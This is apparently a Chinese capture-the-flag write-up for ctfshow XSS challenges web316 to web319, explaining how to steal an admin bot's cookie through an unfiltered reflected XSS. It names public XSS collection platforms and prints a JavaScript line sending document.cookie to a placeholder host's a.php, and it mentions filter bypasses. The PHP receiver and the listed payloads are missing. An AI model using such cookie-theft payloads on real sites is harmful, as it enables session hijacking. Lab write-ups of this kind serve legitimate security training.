web316-无过滤反射型XSS
大概就是要生成Xss代码链接，获取管理员cookie，后台bot每隔一段时间自动点击链接
方法一：xss平台
利用xss平台生成链接

xss平台
https://xsshs.cn/，https://xss.pt/，http://xsscom.com

在xss平台创建项目，选择默认模块即可，复制生成的xss代码，复制到题目留言框中

文章图片

刷新下页面，然后在平台查看项目

文章图片

方法二：自动接收脚本
在自己的服务器上放一个PHP代码

# a.php

// js代码 >document.location.href='http://xxx/a.php?cookie='+document.cookie

JavaScript的 document.cookie 将以字符串的方式返回所有的cookie，类型格式： cookie1=value; cookie2=value;
web317-319简单过滤

• 317过滤script
• 318过滤img

payload

1. 2. xss平台的十六进制编码格式